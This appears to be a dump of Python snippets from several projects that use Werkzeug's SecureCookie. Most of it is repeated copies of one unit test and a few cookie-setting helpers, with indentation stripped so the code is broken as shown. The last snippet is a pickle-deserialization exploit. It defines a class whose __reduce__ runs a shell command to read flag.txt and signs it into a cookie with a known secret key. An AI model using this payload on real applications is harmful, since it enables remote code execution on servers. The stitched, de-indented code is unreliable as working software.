def test_basic_support():
c = SecureCookie(secret_key=b'foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, b'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, b'wrong foo')
assert not c3.modified
assert not c3.new
assert c3 == {}
c4 = SecureCookie({'x': 42}, 'foo')
c4_serialized = c4.serialize()
assert SecureCookie.unserialize(c4_serialized, 'foo') == c4
def test_basic_support():
c = SecureCookie(secret_key=b'foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, b'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, b'wrong foo')
assert not c3.modified
assert not c3.new
assert c3 == {}
c4 = SecureCookie({'x': 42}, 'foo')
c4_serialized = c4.serialize()
assert SecureCookie.unserialize(c4_serialized, 'foo') == c4
def test_basic_support():
c = SecureCookie(secret_key=b"foo")
assert c.new
assert not c.modified
assert not c.should_save
c["x"] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, b"foo")
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, b"wrong foo")
assert not c3.modified
assert not c3.new
assert c3 == {}
c4 = SecureCookie({"x": 42}, "foo")
c4_serialized = c4.serialize()
assert SecureCookie.unserialize(c4_serialized, "foo") == c4
def saveOAuthToken(next, token, secret, max_age=3000):
secretKey = current_app.config['SECRET_KEY'].encode('utf-8')
data = SecureCookie({"token": token, "secret": secret}, secretKey)
expires = datetime.utcnow() + timedelta(seconds=max_age)
resp = make_response(next)
resp.set_cookie('zapfauth_token', data.serialize(), expires=expires)
return resp
def fake_login(request):
if request.method == 'GET':
return Response("FAKE LOGIN", mimetype="text/html")
elif request.method == 'POST':
response = Response("LOGGED IN", mimetype="text/html")
cookie = SecureCookie({"logged_in": True}, SECRET_KEY)
response.set_cookie('session_data', cookie.serialize())
return response
def set_gaema_user(service, user):
gaema_user_key = GAEMA_USER_KEY_FORMAT % service
if hasattr(settings, "GAEMA_STORAGE") and settings.GAEMA_STORAGE == "cookie":
secure_cookie = SecureCookie(user, secret_key=settings.SECRET_KEY)
user_data = secure_cookie.serialize()
set_cookie(gaema_user_key, user_data)
else:
from kay.sessions import renew_session
renew_session(local.request)
local.request.session[gaema_user_key] = user
local.request.session.modified = True
def set_gaema_user(service, user):
gaema_user_key = GAEMA_USER_KEY_FORMAT % service
if hasattr(settings,
"GAEMA_STORAGE") and settings.GAEMA_STORAGE == "cookie":
secure_cookie = SecureCookie(user, secret_key=settings.SECRET_KEY)
user_data = secure_cookie.serialize()
set_cookie(gaema_user_key, user_data)
else:
from kay.sessions import renew_session
renew_session(local.request)
local.request.session[gaema_user_key] = user
local.request.session.modified = True
def set_to_cookie(req_response, cookie, key, value):
cookie_data = request.cookies.get(cookie, None)
if cookie_data is None:
cookie_obj = SecureCookie(secret_key=app.config["SECRET_KEY"])
else:
cookie_obj = SecureCookie.unserialize(cookie_data,
app.config["SECRET_KEY"])
cookie_obj[key] = value
all_cookies = session.get(ALL_COOKIES_KEY, [])
if cookie not in all_cookies:
all_cookies.append(cookie)
session[ALL_COOKIES_KEY] = all_cookies
req_response.set_cookie(cookie, cookie_obj.serialize())
def post_process(self, environ, headers):
user = User.get_current()
if not user:
cookies = http.parse_cookie(environ)
if self.name in cookies:
raw = http.dump_cookie(self.name, '', expires=1)
headers.append((utils.to_native('Set-Cookie'), raw))
return
cookie = SecureCookie({
'uid': user.id,
'session_token': user.get_session_token(),
}, self.secret)
raw = http.dump_cookie(self.name, cookie.serialize(),
expires=self.expires, max_age=self.max_age)
headers.append((utils.to_native('Set-Cookie'), raw))
def post_process(self, environ, headers):
user = User.get_current()
if not user:
cookies = http.parse_cookie(environ)
if self.name in cookies:
raw = http.dump_cookie(self.name, '', expires=1)
headers.append(('Set-Cookie', raw))
return
cookie = SecureCookie(
{
'uid': user.id,
'session_token': user.get_session_token(),
}, self.secret)
raw = http.dump_cookie(self.name,
cookie.serialize(),
expires=self.expires,
max_age=self.max_age)
headers.append(('Set-Cookie', raw))
def test_basic_support(self):
c = SecureCookie(secret_key=b'foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, b'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
self.assert_equal(c2, c)
c3 = SecureCookie.unserialize(s, b'wrong foo')
assert not c3.modified
assert not c3.new
self.assert_equal(c3, {})
def test_basic_support(self):
c = SecureCookie(secret_key='foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, 'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, 'wrong foo')
assert not c3.modified
assert not c3.new
assert c3 == {}
def test_basic_support(self):
c = SecureCookie(secret_key='foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, 'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, 'wrong foo')
assert not c3.modified
assert not c3.new
assert c3 == {}
def test_basic_support(self):
c = SecureCookie(secret_key=b'foo')
assert c.new
assert not c.modified
assert not c.should_save
c['x'] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, b'foo')
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
self.assert_equal(c2, c)
c3 = SecureCookie.unserialize(s, b'wrong foo')
assert not c3.modified
assert not c3.new
self.assert_equal(c3, {})
def test_basic_support(self):
c = SecureCookie(secret_key="foo")
assert c.new
print c.modified, c.should_save
assert not c.modified
assert not c.should_save
c["x"] = 42
assert c.modified
assert c.should_save
s = c.serialize()
c2 = SecureCookie.unserialize(s, "foo")
assert c is not c2
assert not c2.new
assert not c2.modified
assert not c2.should_save
assert c2 == c
c3 = SecureCookie.unserialize(s, "wrong foo")
assert not c3.modified
assert not c3.new
assert c3 == {}
import os
import subprocess
from werkzeug.contrib.securecookie import SecureCookie
class RCE(object):
def __reduce__(self):
return (subprocess.check_output, (['cat','flag.txt'],))
SECRET_KEY = 'superdupersecretflagonkey'
payload = {'name': RCE() , 'username': '******'}
x = SecureCookie(payload, SECRET_KEY)
value = x.serialize()
print(value)
